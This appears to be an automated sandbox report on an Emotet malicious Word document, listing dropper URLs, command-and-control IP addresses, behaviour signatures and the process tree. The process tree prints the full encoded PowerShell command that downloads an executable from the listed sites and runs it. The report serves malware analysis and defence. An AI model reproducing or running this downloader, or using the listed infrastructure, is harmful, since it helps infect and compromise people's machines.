Analysis

  • max time kernel
    29s
  • resource
    win10v191014
  • submitted
    30-01-2020 21:34

General

  • Target

    0bc8fbdffdd026661700a901a68d6cff4cea5837c35fb1cab2d524f89eb8f0c8.doc

  • Sample

    200130-ew9pefmq3n

  • SHA256

    0bc8fbdffdd026661700a901a68d6cff4cea5837c35fb1cab2d524f89eb8f0c8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://anivfx.kr/wp-snapshots/vsGnmTxC/

exe.dropper

http://unoparjab.com.br/wp-content/themes/twentysixteen/shqjYS/

exe.dropper

http://5designradioa.com/cgi-bin/hel3pgfj0u-utw9ye5h-00601/

exe.dropper

http://agencia619.online/cli/nntYnR/

exe.dropper

http://africa2h.org/wp-content/brxhQk/

Extracted

Family

emotet

C2

68.183.18.169:8080

178.62.75.204:8080

192.241.220.183:8080

177.103.240.93:80

196.6.119.137:80

203.124.57.50:80

195.250.143.182:80

95.66.182.136:80

78.189.60.109:443

98.192.74.164:80

50.116.78.109:8080

88.247.26.78:80

51.38.134.203:8080

37.70.131.107:80

186.10.92.114:80

105.209.235.113:8080

80.211.32.88:8080

75.86.6.174:80

192.210.217.94:8080

58.185.224.18:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0bc8fbdffdd026661700a901a68d6cff4cea5837c35fb1cab2d524f89eb8f0c8.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4984
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABXAGUAaABnAGwAbgB1AHUAZQB5AD0AJwBDAHMAcgBxAGgAYwBnAHYAdwAnADsAJABNAGQAdwBrAHgAdAB1AGsAYQBhAHMAaQBlACAAPQAgACcAMQA3ADAAJwA7ACQAWQBnAGkAegBoAHgAcgB0AHoAaAByAG4AcgA9ACcASQByAGkAcwBsAGsAbgBzAHIAaQBrAGsAJwA7ACQAUQBhAHkAcAByAG4AcwB5AHYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE0AZAB3AGsAeAB0AHUAawBhAGEAcwBpAGUAKwAnAC4AZQB4AGUAJwA7ACQAVQBuAHIAdABpAGkAZQBlAHYAbQBnAGcAdAA9ACcAQQBkAHoAcwBoAHgAZABuAGwAegBuAGsAJwA7ACQASgBvAG8AcABqAG8AdQBzAGcAeQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAATgBFAFQALgB3AEUAQgBjAGwASQBlAG4AVAA7ACQAQQBkAHkAbgBmAHUAYwB1AHoAbAB2AHQAZgA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AaQB2AGYAeAAuAGsAcgAvAHcAcAAtAHMAbgBhAHAAcwBoAG8AdABzAC8AdgBzAEcAbgBtAFQAeABDAC8AKgBoAHQAdABwADoALwAvAHUAbgBvAHAAYQByAGoAYQBiAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdABoAGUAbQBlAHMALwB0AHcAZQBuAHQAeQBzAGkAeAB0AGUAZQBuAC8AcwBoAHEAagBZAFMALwAqAGgAdAB0AHAAOgAvAC8ANQBkAGUAcwBpAGcAbgByAGEAZABpAG8AYQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGgAZQBsADMAcABnAGYAagAwAHUALQB1AHQAdwA5AHkAZQA1AGgALQAwADAANgAwADEALwAqAGgAdAB0AHAAOgAvAC8AYQBnAGUAbgBjAGkAYQA2ADEAOQAuAG8AbgBsAGkAbgBlAC8AYwBsAGkALwBuAG4AdABZAG4AUgAvACoAaAB0AHQAcAA6AC8ALwBhAGYAcgBpAGMAYQAyAGgALgBvAHIAZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAHIAeABoAFEAawAvACcALgAiAHMAcABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUgB4AG0AbAB2AGUAdQB6AHUAaQBnAD0AJwBXAHcAbQBmAHEAaAB4AHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAagBiAGkAYQBiAHYAdwByAGIAcwAgAGkAbgAgACQAQQBkAHkAbgBmAHUAYwB1AHoAbAB2AHQAZgApAHsAdAByAHkAewAkAEoAbwBvAHAAagBvAHUAcwBnAHkALgAiAGQAbwBgAFcATgBsAE8AYQBEAGAARgBJAGwARQAiACgAJABDAGoAYgBpAGEAYgB2AHcAcgBiAHMALAAgACQAUQBhAHkAcAByAG4AcwB5AHYAKQA7ACQAUwB6AGIAcQB6AGcAdAB1AHgAcQA9ACcATwB0AHYAeQBiAGEAYgBqACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQBhAHkAcAByAG4AcwB5AHYAKQAuACIAbABlAG4AYABHAHQASAAiACAALQBnAGUAIAAzADIAOQA1ADIAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYQBgAFQARQAiACgAJABRAGEAeQBwAHIAbgBzAHkAdgApADsAJABUAGgAcgB6AHUAeABjAHIAegBtAG0APQAnAFUAbwB2AHQAYgBuAGkAYQBwAHMAJwA7AGIAcgBlAGEAawA7ACQASgBzAGcAeABwAHYAdQBmAGkAaABqAGkAPQAnAFgAdgB5AG8AcgBjAHkAaQBlAG0AZQBoAGgAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBlAG8AagBnAGsAZQB2AD0AJwBSAHMAbwBlAG0AZQBtAG0AYwBwACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:3848
  • C:\Users\Admin\170.exe
    C:\Users\Admin\170.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\Users\Admin\170.exe
      --89c7e6c8
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EmotetMutantsSpam
      • Executes dropped EXE
      PID:3960

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3960-8-0x00000000009E0000-0x00000000009F7000-memory.dmp

    Filesize

    92KB

  • memory/3960-9-0x0000000000400000-0x00000000004F5000-memory.dmp

    Filesize

    980KB

  • memory/4764-6-0x00000000007A0000-0x00000000007B7000-memory.dmp

    Filesize

    92KB